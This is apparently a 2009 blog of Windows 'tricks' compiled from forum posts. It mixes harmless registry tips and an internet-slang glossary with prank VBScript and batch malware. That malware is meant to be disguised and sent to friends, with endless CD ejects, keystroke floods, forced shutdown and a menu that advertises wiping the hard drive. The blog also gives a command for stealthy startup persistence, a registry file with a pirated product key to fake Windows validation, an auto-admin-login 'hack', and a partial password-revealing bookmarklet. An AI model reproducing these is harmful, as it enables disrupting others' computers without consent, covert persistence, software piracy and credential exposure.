Wednesday, October 14, 2009

Automatically Close the "Non Responding" program!!!!!!!!

When an application fails to respond during shutdown a dialog box is displayed prompting the user to either end it now or to wait. Enabling the value AutoEndTasks will take care of the non-responding application without user intervention.


This is how to do it


To Implement for All Users

[Start] [Run] [Regedit]
Registry Key: HKEY_USERS\.DEFAULT\Control Panel\Desktop
Data Type: REG_SZ [String Value] // Value Name: AutoEndTasks
Modify/Create the Value Name [AutoEndTasks] according to the Value Data listed below.
Value Data: [0 = AutoEndTasks Disabled / 1 = AutoEndTasks Enabled]
Exit Registry and Reboot

To Implement for Individual Users

[Start] [Run] [Regedit]
Registry Key: HKEY_CURRENT_USER\Control Panel\Desktop
Data Type: REG_SZ [String Value] // Value Name: AutoEndTasks
Modify/Create the Value Name [AutoEndTasks] according to the Value Data listed below.
Value Data: [0 = AutoEndTasks Disabled / 1 = AutoEndTasks Enabled]
Exit Registry and Reboot

Enjoy guys

How To Stop : Virus That Will Open And Close Your Cdrom

When somebody opens the 'virus' the CD/DVDROMs of it's computer
will open and close until you go crazy because it can be stopped by closing the CD/DVDROMs.

4. The only way to stop this is to press CTRL+ALT+DEL and stop the process wscript.exe.



How To Log On Automatically On Windows Vista -==SBX==-

Sometimes you don't have extremely important or sensitive information on your computer ( for example a gaming computer ) and you don't like to log in every single time you reboot your computer.

You can set your computer to log in automatically.

1. Type control userpasswords2 into the Start menu search box and press Enter to go to Advanced User Accounts Control Panel.



2. Uncheck the box "Users must enter a user name and password to use this computer", and then press Apply. Enter the right username and password in the boxes shown. Press OK.



Now your computer will log in automatically each time you start it.

A Self-Made Virus That Will Open And Close Your Cdrom

Well,its a virus and a prank! you can even modify it.


Code:
Set oWMP = CreateObject("WMPlayer.OCX.7" ) Set colCDROMs = oWMP.cdromCollection if colCDROMs.Count >= 1 then do For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next ' cdrom For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next ' cdrom loop End If


Quote:
copy this into notepad and save it as anyname.vbs like virus.vbs
and then double click on it...what u see....bingo

Now if u want to disable this go to task manager click on process
then find wscript.exe and end this process.

Rename it,so that it looks something important and then send it to all your friends to annoy them.

10 notepad triks 2 fool ur frnds

1>
Toggle your friend's Caps Lock button simultaneously:

Open Notepad and Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop


Save it as "Anything.VBS" and send it

2>olredy posted
Continuously pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop


Save it as "Anything.VBS" and send it.


3>
Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop


Save it as "Anything.VBS" and send it.


4>
Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop


Save it as "Anything.VBS" and send it.


5>olredy posted
Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "


Save it as "Anything.VBS" and send it.



6>
Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop


Save it as "Anything.VBS" and send it.


7>
Cycle a message in your friend's computer:

Type :

@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN


Save it as "Anything.BAT" and send it.


8>
Convey your friend a lil' message and shut down his / her computer:
Type :

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s


Save it as "Anything.BAT" in All Files and send it.



9>
Open Notepad continually in your friend's computer:
Type :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


Save it as "Anything.BAT" and send it.


10>

Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown

Type :

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two


Save it as "Anything.BAT" and send it.



Tuesday, October 13, 2009

Steps to Write Protect your USB Pen Drive

Steps to make your drive Write Protected:

1. Open Registry Editor by typing regedit in Run dialog.

2. Navigate to the key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\

3. Find a sub key inside it named “StorageDevicePolicies”. If it does not exist there then we need to make it. Right click on “Control” key -> New -> Key. Name it “StorageDevicePolicies” without quotes.



4. Now right click on this newly created key and then click New -> DWORD value and name it as “WriteProtect”.



5. Modify this key and give it a value 1.



6. Click OK, and remember to restart the PC.

Now no more data can be transferred to the drive but to start using the drive again just give the “WriteProtect” key a value of 0 instead of 1 and restart the PC.

So any thoughts how you are going to use this trick?

How to add a file to startup without the user knowing

This can be quite dangerous and if the program is deleted it will lagg their computer alot. This is mainly used to a batch file also known as a .bat file to run on the start up of windows.... Just copy the following.

@echo off
reg add
HKEY_LOCAL_MACHINE\Software\Mi crosoft\Windows\CurrentVersion \Run /v test /t reg_sz /d C:\Program Files\WHATEVERTHEFILEISYOUWANTTOAD.THEEXTENTION

You must have the file after the /d ready before you add the regkey or it will not work...

error of Removing the DisableRegistryTools

go Run


"REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f"

how to scan pc without inastll anti virus DOS mode

NOTE: (First Delet all the Temporary files in all machine before scanning Because it get much more time consuming)

• DOWNLOAD THE LATEST VIRUS DEFINATION FILE FROM INTERNET (Download only SDAT file)

http://www.mcafee.com/apps/downloads/security_updates/superdat.asp?region=us&segment=enterprise

• CREATE SCAN AS A TEMPORARY FOLDER ON THE ROOT DIRECTORY
( C DRIVE) .

• COPY THE LATEST SUPERDAT FILE i.e. SDAT4XXX.EXE INTO THE SCAN FOLDER.

• OPEN SCAN FOLDER ALSO OPEN RUN BOX & DRAG SDAT IN THAT RUN BOX GO TO END OF PATH SPACE FORWORD SLASH & THAN TYPE E

eg. C:\scan\sdatxxx.exe /e

(This will extract all required files to scan in SCAN folder)

COPY SCAN.BATCH FILE IN SCAN FOLDER*

• BOOT THE MACHINE IN COMMAND PROMPT (PRESS F8 KEY)

• CHOOSE COMMAND PROMPT ONLY OPTION.

• COME TO C:\SCAN
C:\Documents and Settings\Administrator>cd\

C:\>cd scan

C:\scan>
================================================== ================================================== ================
SCRIPT OF SCAN.BAT
================================================== ========
echo off
cd\
cd scan
scan /adl /clean /all /analyze /secure /program /streams /mime /mailbox /allole /rpterr /rptcor /winmem /report vIRUS.txt
================================================== ========
*IT IS SCRIPT OF SCAN.BAT

Convert an IP address to an IP Number

IP address (IPv4 / IPv6) is divided into 4 sub-blocks. Each sub-block has a different weight number each powered by 256. IP number is being used in the database because it is efficient to search between a range of number in database.

Beginning IP number and Ending IP Number are calculated based on following formula:

IP Number = 16777216*w + 65536*x + 256*y + z (Formula 1)

where
IP Address = w.x.y.z

For example, if IP address is "202.186.13.4", then its IP Number "3401190660" is based on the Formula 1.

IP Address = 202.186.13.4

So, w = 202, x = 186, y = 13 and z = 4

IP Number = 16777216*202 + 65536*186 + 256*13 + 4
= 3388997632 + 12189696 + 3328 + 4
= 3401190660

To reverse IP number to IP address,

w = int ( IP Number / 16777216 ) % 256
x = int ( IP Number / 65536 ) % 256
y = int ( IP Number / 256 ) % 256
z = int ( IP Number ) % 256

where % is the mod operator and int is return the integer part of the division.

Wednesday, September 2, 2009

Hide your Hard Disk Drives | Hide Important data from other USERS

When you need to secure your important data from other users, there are so many choice over there like folder protect,hide folder and much more. But imagine if your data size is more than 100 GB then it is not easy to burn it on CD or protect it. So don't worry friends, I am posting a trick by using this trick you can save your full drive by hiding it from other users. You can hide your drives without any Registry Edit.


1. Log on as Administrator

2. Click on Start button then click on Run > Type CMD



3.Now type diskpart at the command prompt and wait for 5 seconds to appear diskpart> utility.



4.To show the list of volume, type list volume

command after the diskpart> prompt, this command will show you all system drives detail.


5.Now Select the volume that you want to hide for example

If you want to hide F drive then first type select volume 2 (in this case) and hit enter button.



6.After selecting volume, type Remove letter F (in this case) to hide F drive.



7. DONE. Now you hide your drive successfully..to verify go to My Computer
and check drives

8.But next time, when you want to unhide the F drive, just type assign letter F command after loading volume 2.

Make your xp genuine, ALTERNATE SOLUTION (works for XP SP3)

I’ve just tested this on Windows XP Professional SP3, v.3300 (Build #2600) so I’m pretty sure it’s good for ANY XP service packs.

1. Open notepad and paste the following code:





Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]
"CurrentBuild"="1.511.1 () (Obsolete data - do not use)"
"ProductId"="55274-640-1011873-23081"
"DigitalProductId"=hex:a4,00,00,00,03,00,00,00,35, 35,32,37,34,2d,36,34,30,2d,\
31,30,31,31,38,37,33,2d,32,33,30,38,31,00,2e,00,00 ,00,41,32,32,2d,30,30,30,\
30,31,00,00,00,00,00,00,00,86,56,4e,4c,21,1b,2b,6a ,a3,78,8e,8f,98,5c,00,00,\
00,00,00,00,dd,da,47,41,cc,6b,06,00,00,00,00,00,00 ,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,38,31,30,32,36,00 ,00,00,00,00,00,00,b5,16,\
00,00,83,83,1f,38,f8,01,00,00,f5,1c,00,00,00,00,00 ,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 ,66,e5,70,f3
"LicenseInfo"=hex:33,b7,21,c1,e5,e7,cd,4b,fd,7c,c6 ,35,51,fd,52,57,17,86,3e,18,\
d3,f4,8c,8e,35,32,7b,d1,43,8d,61,38,60,a4,ca,55,c9 ,9a,35,17,46,7a,4f,91,fc,\
4a,d9,db,64,5c,c4,e2,0f,34,f3,ea

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents]
"OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33,93,f d





2. Save the *.txt file, and rename it "Filename.reg".

3. Run it. (Or right click, and select "Add to registry").

That’s it! Validation Complete!

Thank you for validating your copy of Microsoft Windows. Thank you for using the Windows Genuine Advantage program. You may now access resources for genuine Windows users.

Go to
Code:
http://www.microsoft.com/genuine/downloads/FAQ.aspx
, click Validate Windows - you should be able to apply these updates:

Downloading Microsoft .NET Framework version 1.1 (update 1 of 5)… done!
Downloading Windows Malicious Software Removal Tool - April 2008 (KB890830) (update 2 of 5)… done!
Downloading Security Update for Microsoft .NET Framework, Version 2.0 (KB928365) (update 3 of 5)… done!
Downloading Root Certificates Update (update 4 of 5)… done!
Downloading Windows Internet Explorer 7 for Windows XP (update 5 of 5)… done!
Initializing installation… done!
Installing Microsoft .NET Framework version 1.1 (update 1 of 5)… done!
Installing Windows Malicious Software Removal Tool - April 2008 (KB890830) (update 2 of 5)… done!
Installing Security Update for Microsoft .NET Framework, Version 2.0 (KB928365) (update 3 of 5)… done!
Installing Root Certificates Update (update 4 of 5)… done!
Installing Windows Internet Explorer 7 for Windows XP (update 5 of 5)…

Regular Updates should work fine as well

The Microsoft Song | Xp installation intro

Go to Start > Run > Copy and then Paste the location shown below,

Now you can see what's hidden




* C:\ where ur XP is installed

and hit Enter, of course ... Your media player should load the song, and now you can hear it.

firefox: 7 hidden pages

firefox: 7 hidden pages

about: - The same as the one under the Help menu. So I’m not sure if this is exactly hidden. Shows the same thing.
about:buildconfig - Shows the build configurations and some parameters
about:cache - Shows you some detailed stats on your disk and memory cache which includes the directory and the list of files/web pages accessed and stored there.
about:config - Pointed this out way back. Allows you to configure Firefox in-depth.
aboutlugins - Lists all the installed plug-ins in your browser.
about:credits - The long-ish list of people who have helped in building our favorite browser.
about:Mozilla - Freaky if you ask me. And very cryptic. It seems to be a quote from a passage in “The Book of Mozilla.” You can’t find that anywhere though.

A lil script to reveal hidden passwords on the page

as the user posted

Just copy and paste that into the url bar on any page, and if there are any passwords that are hidden in asterisks or anything, then it will come up in a lil popup. Tested by me on IE7

php code

Code:
javascript:(function(){var s,F,j,f,i; s = %22%22; F = document.forms; for(j=0; j

Cool Dangerous Secrets of Google Searching


What You Will Learn...
Google serves some 80 percent of all search queries on the Internet, making it by far the most popular search engine. Its popularity is due not only to excellent search effectiveness, but also extensive querying capabilities. However, we should also remember that the Internet is a highly dynamic medium, so the results presented by Google are not always up-to-date – some search results might be stale, while other relevant resources might not yet have been visited by Googlebot (the automatic script that browses and indexes Web resources for Google). Information which should be protected is very often publicly available, revealed by careless or ignorant users. The result is that lots of confidential data is freely available on the Internet – just Google for it.

What You Will Learn...
• how to use Google to find sources of personal
information and other confidential data,
• how to find information about vulnerable systems
and Web services,
• how to locate publicly available network devices
using Google.
What You Should Know...
• how to use a Web browser,
• basic rules of operation of the HTTP protocol.
Link :
Code:
http://www.gazup.com/y7bYg-dangerousgoogle.pdf-download-mirrors

Smile 5 Easy Steps to Speed-Up Ur Connectivity Speed!!!

Here's a 5 easy steps how to make u can get a better connectivity & Speed!!!

Code:
http://rapidshare.com/files/176562952/5_ways_to_Increase_Internet_Connection.rar
There's a Video tutorial : which show U how to so just follow as I do.... Be-carefull as U got to do same procedure so please.... I'm sure u get a better and fast speed of Browsing, Downloading, Uploading, with any method like Direct link, Network, Torrent.....OR any other so,...go ahead and try to get it better

And don't forget to "Log-off and then Restart the System after this procedure"!!!

And Please do rep. me if U go it.....Please don't forget too...and i will sure come to U as more and better Tutorial....So,....Remember to rep. me (Its there Left hand side on the screen drag a bit down and please try to Give it a approval!!)

Password is : staff!

Speeding HTTP requests/ Internet Explorer speeding

Speeding HTTP requests/ Internet Explorer speeding


How to speed Up HTTP Requests On Internet Explorer

To comply with current Internet standards, Internet Explorer limits the number of simultaneous downloads to two downloads, plus one queued download. This configuration is a function of the browser. However, as connection speeds increase, and the number of total connections that are allowed to Internet servers increase, the two-connection limit may be restrictive.

Please Note: Changing the maximum number of connections beyond two is a violation of Internet standards; use at your own risk!

To increase the number of simultaneous connections that are allowed, follow these steps:


1. Start the Registry Editor
2. Go to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Internet Settings
3. Select New > DWORD Value from the Edit menu
4. Name the new value MaxConnectionsPer1_0Server
5. Right-click the MaxConnectionsPer1_0Server value and choose Modify
6. Under Base, click the radio button next to Decimal
7. In the Value Data: box enter the number of simultaneous connections you want to set (for example 10 is a good value), and 8. click OK
9. Repeat steps 3 - 7 using the new value MaxConnectionsPerServer
10. Exit the registry editor

Trick to Show ur name after time in taskbar...| 100 % workin

Trick to Show ur name after time in taskbar...


Hi freinds !

I m here to tell u a trick to add up ur name in place of AM and PM beside time and make urself to feel proud among ur group of frnds.
Its simple...

Start -> Control Pannel -> Regional and LAnguage option -> Customize (beside English US) -> Go to TIME tab -> Change AM symbol and PM symbol from AM and PM to ur name -> Apply -> Ok ...


IS it changed Might be not ...Now go to time in taskbar and Double Click it to open "Date and time property" ...Look place where time chnges in digital form i.e. 02:47:52 AM , click to arrow to cnage the AM or PM by selecting and press arrow. It will Show ur name or name that was entered by u, Apply -> OK






IS IT WORKING NOW






A SIMPLE REP WILL BOOST ME POST MORE

Automatic Administrator Login

Automatic Administrator Login
Well here's the trick which you can use to prove that Windows XP is not at all secure as multi-user operating system. Hacking the system registry from any account having access to system registry puts you in to the administrator account.
REGEDIT 4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="1"

How to Update and Change Windows XP Product Key Manually Instead of using software?

Although there are plenty of software applications that can change the product key installed in Windows XP automatically, but some users may prefer to manually change the product key by themselves. Changing or modifying Windows XP product key is not a common practice after installation, especially so if already activated, and that explains why Microsoft didn’t have built-in mechanism to edit the product key used in Windows XP.

However, for some reason such as the need to change the product key to newly purchased genuine product key, especially when the existing installation of OS is pirated or illegal. The situation also happens in big corporations which have volume licensing (VL) agreemnts with Microsoft, which tends to use a same VLK (Volume License Key) or leaked product key to activate all computers. To enter and make use of the new product key does not really require whole fresh re-installation of Windows XP. Follow the hacking guide below to remove and delete current product key used to activate existing copy of Windows XP, and force the OS to prompt user to enter new product key for activation.

1. Click on Start and then Run.

2. In the Open text box, type regedit and click OK to run Registry Editor program.

3. In the left pane, locate and then click the following registry key:

HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\Cu rrent Version\WPAEvents

4. In the right pane, right-click OOBETimer, and then click Modify.

5. Change at least one digit of this value in the Value Data to deactivate Windows.

6. Click Start, and then click Run.

7. In the Open box, type the following command, and then click OK:

%systemroot%\system32\oobe\msoobe.exe /a

8. When the Windows Product Activation window appears



click Yes, I want to telephone a customer service representative to activate Windows, and then click Next.



9. Click Change Product key.



10. Type the new product key in the New key boxes, and then click Update.

If you are returned to the previous window, click Remind me later, and then restart the computer.

11. For user using OEM system or volume license product key (VLK), repeat steps 6 and 7 to verify that Windows is activated. User should receive the following message:

Windows is already activated. Click OK to exit.

For retail Windows XP users, a 30 days registration for activation reminder will appear. User will have to connect to Internet for online registration and activation, or call the local Microsoft activation hotline for phone activation.

Notepad time and date trick

Easy and fun trick with your notepad. Lets try, now open a blank notepad file:

*

Write .LOG as the first line of the file and press enter.
*

Save your notepad file name and close it.
*

Double-click again your notepad file to open notepad and opinion added that the date and time at the end of the file..WOOT !! And place the cursor on the next line.
*

Enter your notes and then save and close the file.

Every time you open the notepad file, Notepad repeat the process, adding the date and time automatically at the end of the roster and placing the cursor below.

Noobs guide to Internet slang phrases

WARNING!SOME WORDS MAY BE OFFENSIVE!!!!!!!
0-9


1337 (written in ASCII) - From the word Leet, derived from the word elite
2 - too, or to
4 - For

A


AFAICR/S/T - As far as I can recall / remember / see / tel
AFAIK - As far as I know
AFK - Away from keyboard
ANFSCD - And Now For Something Completely Different. Used to change the subject of conversation.
ASAP - As soon as possible
ASL - Age / sex / location
ATEOTD - At The End of the Day
ATM - At the moment
AWOL - Absent Without (Official) Leave
AYBABTU (also abbreviated as AYB) - All your base are belong to us (from the video game Zero Wing)

B


B2B - Business to Business
B& and/or B7- Banned
BBIAB - Be back in a bit
BBL/S - Be back later / shortly / soon
BCNU - Be seein' you
Blog - Also known as web log or an online journal
BOFH - ~censored~ operator from hell
Bot - Any type of automated software in chatrooms and web-cataloging software
BRB - Be right back
BSOD - Blue Screen of Death
BTDT - Been there done that
BTW - By the way
Bump - Increment (For example, C's ++ operator.)or a backronym for "Bring Up My Post"

C


Crawl - To retrieve a web page along with the hyperlinks that reference it
Crapplet - A poorly written computer application
CU - See you (later)
CYA - See ya OR Cover Your Ass
Cyber (prefix) - A term used to connect the subsequent word loosely to the world of computers or the Internet or sex over a computer
Cyberspace - Virtual reality, the Internet, the World Wide Web, and other kinds of computer systems. Science fiction author William Gibson popularized the term in his novel Neuromancer. Gibson used the word to describe a virtual world of computer networks that his cyberpunk heroes 'jacked into'

D


DFTT - Don't feed the trolls
DGAF - Don't Give A ~censored~
DIAF - Die in a fire
DILLIGAF/D/S - Does it look like I give a flip / ~censored~ / damn / shit
DND - Do not disturb
DOA - Dead on arrival. Refers to hardware that is broken on delivery.

E


EOF - End Of File
EOM - End of Message
EOL - End of Life. Device or hardware that is at the end of its product life cycle.
EQ - EverQuest
ETA - Estimated time of arrival

F


FAQ - Frequently Asked Question(s)
FFS - For ~censored~'s sake
Flamer - Someone who makes inflammatory, abusive or directly offensive comments. Similar to, but not quite the same as an Internet troll[3]
FMCDH - From My Cold Dead Hands
FOAD - ~censored~ off and die
FOAF - Friend of a friend
FTL - For the loss
FTW - For the win
FU - ~censored~ you
FUBAR - ~censored~ up beyond all recognition / repair (from military slang; pronounced "foo-bar")
FUD - Fear, Uncertainty and Doubt (the purposeful spread of misinformation)
FWIW - For what it's worth
FYI - For your information

G


GBTW - Get back to work
GF - Great/good fight/girlfriend
GFU - Good for you
GFY - Go ~censored~ yourself
GG - Good game, used at or near the conclusion of a gaming match
GJ - Good job, often used in online gaming when a teammate performs an act benefitting his team, such as killing an opponent or enabling that kill
GMTA - Great minds think alike
Godwin's Law - Dictates that the longer a thread, the more likely someone will post a comparison involving Nazis or Hitler
Gratz - Congratulations
GTFO - Get the ~censored~ out
GTG or G2G - 'Got to go' or 'Good to go'
GR -Good Race
GR8 - Great

H


HAND - Have A Nice Day
Handle - Name used in online chat, (AKA nick(name), alias, screen/user name)
HF - Have fun
Haxor or H4x0r (1337) - Hacker
Hit - A request made to the web server, (noun) the results of an internet search, (verb) loading a Web page. Hits are not equivalent to visitors of a webpage.
Home page - The website's introduction page, starting point, and guide. The technical term is "index"
Hot list - A collection of publicly available URLs (World Wide Web site addresses), sometimes available as text files.
HTH - Hope this / that helps
H8 - Hate

I


IANAL - I am not a lawyer
IBTL - In before the lock
IDC - I don't care
IDK - I don't know
IIRC - If I recall / remember correctly
IIUC - If I understand correctly
IMO/IMHO/IMNSHO/IMAO - In my (humble / honest / not so humble / arrogant) opinion
Information superhighway - The Internet (AKA: I-way, infobahn)
IONO - I don't know
IOW - In other words
IRC - Internet Relay Chat
IRL - In real life
ITYM - I Think You Mean
IWSN - I want sex now
IYKWIM - If you know what I mean

J


Jaggy - Aliased computer graphics
JK or j/k - Just kidding, or joke
JFGI - Just ~censored~/Freaking Google It

K


k or kk - OK
KISS - Keep it simple stupid.
KS(ing) - Kill-Steal(ing)
KOS - Kill on sight
KTHX - OK, thanks
KTHXBAI or KTHXBYE - OK, thanks, goodbye, used either to cut short a conversation or to express displeasure with being cut short

L


L2P - Learn to play; an admonishment to MMORPG players who are incompetent and/or whine
L8R - Later, L8R also sometimes abbreviated as L8ER is commonly used in chat rooms and other text based communications as a way of saying good bye.
Lag - Slang term for slow Internet speeds or high Internet latency; Lag is sometimes due to a server problem, but more frequently due to the connection between client and server. A slow or intermittent connection may often be referred to as laggy
Lamer - A know-nothing, one who is lame.
Leet - Often spelled as l33t or 1337 in ASCII form. It originally meant elite
LFG - Looking for group
LFM - Looking for more
LM(F)AO - Laughing my (frigging) ass off
LMIRL - Let's meet in real life.
LMK - Let me know
LOL - Laughing out loud, laugh out loud
LTNS - Long time no see
Lurker - Someone who frequents a Usenet group without participating in discussions

M


MMORPG, MMO - Massive Multi-player Online Role Playing Game
MMOFPS - Massive Multi-player Online First Person Shooter
MOTD - Message of the day
MS - MapleStory, an MMORPG
MTFBWY - May The Force be with you
MUD - Multi-User Dungeon
MUSH - Multi-User Shared Hallucination
MYOB - Mind your own business
M8 - Mate

N


NE1 - "Anyone"
NFI - "No ~censored~ Idea"
Newbie, noob, or n00b - An inexperienced user of a system or game,or an annoying person.
NIFOC - Naked In Front Of Computer
NM - (Sometimes written N/M) Not much, Never mind or no message, used on message boards or in e-mails to indicate that everything is already said in the subject line.
NP - No problem
NSFW - Not safe for work. Warning about content that may get the viewer in trouble with his employer or co-workers.
NVM, NVMD, or nm - Nevermind, not much

O


O RLY - Oh really?
OIC - Oh, I see
OFN - Old ~censored~ news
OMG - Oh my god
OMFG - Oh my ~censored~ god
OMW - On my way or Oh my word
OP - Original poster / Operator / Outpost
OS - Operating system
OT - Off topic
OTOH - On the other hand
OTP - On the phone or One true pairing

P


P2P - Peer to peer, or pay to play
PAW - Parents are watching
PEBKAC/PEBCAK - Problem exists between keyboard and chair
Ping - From the popular network monitoring tool, used as a greeting similar to "Are you there?".
PITA - Pain in the arse / ass
PLMK - Please let me know
PMSL - Pissing myself laughing
POS - Piece of shit, or parent over shoulder.
POTS - Plain old telephone service
POV - Point of view
PPL - People
PTKFGS - Punch the Keys For God's Sake
pr0n - Intentional misspelling of porn
PW - Persistent World (gaming)
pwned - Intentional misspelling of owned

Q


QFT - Quoted for truth. Used on internet message boards to show agreement from a previous message


R


Rehi (or merely re) - Hello again
RL - Real Life[3]
RO(T)FL - Rolling on (the) floor laughing
RO(T)FLMAO - Rolling on (the) floor laughing my ass off
RO(T)FLOL - Rolling on (the) floor laughing out loud
RSN - Real soon now (used sarcastically)
RTFB - Read the ~censored~ binary (or book)
RTFS - Read the ~censored~ source
RTFM/RTM - Read the (~censored~) manual

S


SCNR - Sorry, could not resist
sk8/sk8r - skate/skater
Smiley - Another name for emoticons
SMH - Shaking my head
SNAFU - Situation normal: all (~censored~/[3]fouled) up
Snail mail - Normal paper mail service
SOHF - Sense of humor failure
Spider - The program behind a search engine
STFU - Shut the ~censored~ up
STFW - Search the ~censored~ web

T


TANSTAAFL - There ain't no such thing as a free lunch
TBF - Time between failures
TBH - To be honest
TG - That's great
TGIF - Thank god it's Friday
TH(N)X, TNX or TX - Thanks
TIA - Thanks in advance
TINC - There Is No Cabal, a term discouraging conspiracy theories
TMI - Too much information
TOS - Terms of service
TTBOMK - To the best of my knowledge
TTFN - Ta ta for now
TTT - To the top, used in forums to bump a thread
TTYL - Talk to you later (also spelled TTUL, T2UL or T2YL)
TTYTT - To Tell You The Truth
Tweedler - One who has deep love for all computer related technology and gadgets
TWIMC - To Whom It May Concern
TY - Thank you
TYT - Take your time
TYVM - Thank you very much

U


U - You
UTFSE - Use the ~censored~ search engine

V

W


w00t, w00T or WOOT - First two express exuberance, the latter is a backronym for the term "We Own the Other Team".
W/ or W/O - With or without
WB - Welcome back
W/E - Whatever
WRT - With respect / regard to
WTB - Want to buy
WTF - What the ~censored~
WTG - Way to go
WTH - What the hell
WTS - Want to sell
WTT - Want to trade
WUG - What you got?
WoW - World of Warcraft (game)
WUBU2 - What (have) you been up to?
WUU2 - What (are) you up to?
WYSIWYG - What you see is what you get
W8 - Wait


Y

YARLY - Yeah Really
YHBT - You have been trolled
YKW - You know what?
YMMV - Your mileage may vary.
YTMND - You're The Man Now, Dog
YW - You're welcome.
YOYO- You're On Your Own.


Z
ZOMG - An intentional misspelling of the acronym shorthand for "Oh My God/Gawd" and pronounced "Zoh My God/Gawd" This version is mainly used in jest or to ridicule people who use abbreviations like OMG and OMFG

Auto Delete ! Delete Your Cookies, Temp-Files & History !

U can Make ur Own File with this Code or Download it From here !




















Download it From here !

Auto Delete All Temp_Files, Cookies, History.zip



Copy it and Saveas in .bat Done rop:



File Info

Report generated: 11.12.2008 at 10.43.44 (GMT 1)
Packer detected: WinRAR 32-bit SFX Module [Overlay] *
Self-Extract Archive: Yes => RarSFX Archive
Binder Detector: Nothing found


Detections

a-squared - Nothing found!
Avira AntiVir - Nothing found!
Avast - Nothing found!
AVG - Nothing found!
BitDefender - Nothing found!
ClamAV - Nothing found!
Comodo - Nothing found!
Dr.Web - Nothing found!
Ewido - Nothing found!
F-PROT 6 - Nothing found!
G DATA - Nothing found!
IkarusT3 - Nothing found!
Kaspersky - Nothing found!
McAfee - Nothing found!
MHR (Malware Hash Registry) - Nothing found!
NOD32 v3 - Nothing found!
Norman - Nothing found!
Panda - Nothing found!
Quick Heal - Nothing found!
Solo Antivirus - Nothing found!
Sophos - Nothing found!
TrendMicro - Nothing found!
VBA32 - Nothing found!
Virus Buster - Nothing found!

Tuesday, September 1, 2009

Windows Xp Hidden Account Video
























http://uploading.com/files/1V19F91B/Windows_Xp_Hidden_Account_Video.flv.html

Hide Your IP Address Video Explanation

Today I have a brought another trick for you. Now you can hide your IP with a simple method. This is a beautiful trick in order to access rapidshare free users unlimted times, as well as megaupload and all other mega Servers. Now you can also acess those site which block you to due to country limited quota.

Hurry up 100% working video












































http://uploading.com/files/3T9BLLJB/Hacking_Tip-_Hide_Your_IP_Address.flv.html

Free Calls Using Goog 411 Video

Hi, Folks
Today I have a brougth another trick of making a free call by using Goog 411 for unlimited time. The whole procedure is explained in the following video. This video will explain to each and every thing regarding the making a free call.























































Download Link

Shutdown your Computer with a Cell Phone video

hutdown your Computer with a Cell Phone video

Hello, Brothers

Today I have brought an intresting trick regarding using your cell phone. Now you can shutdown your computer by using your cell phone. It is a beautiful trick regarding windows network connections. A very effective trick for the learners of programming.

--------------------------------------------------------------------------------

This video will explain the whole Procedure

Author(s): -
Publisher: -
Date : -
Pages :
Format : FLV
OCR :
Quality :
Language : English
ISBN-10 :
ISBN-13 :
















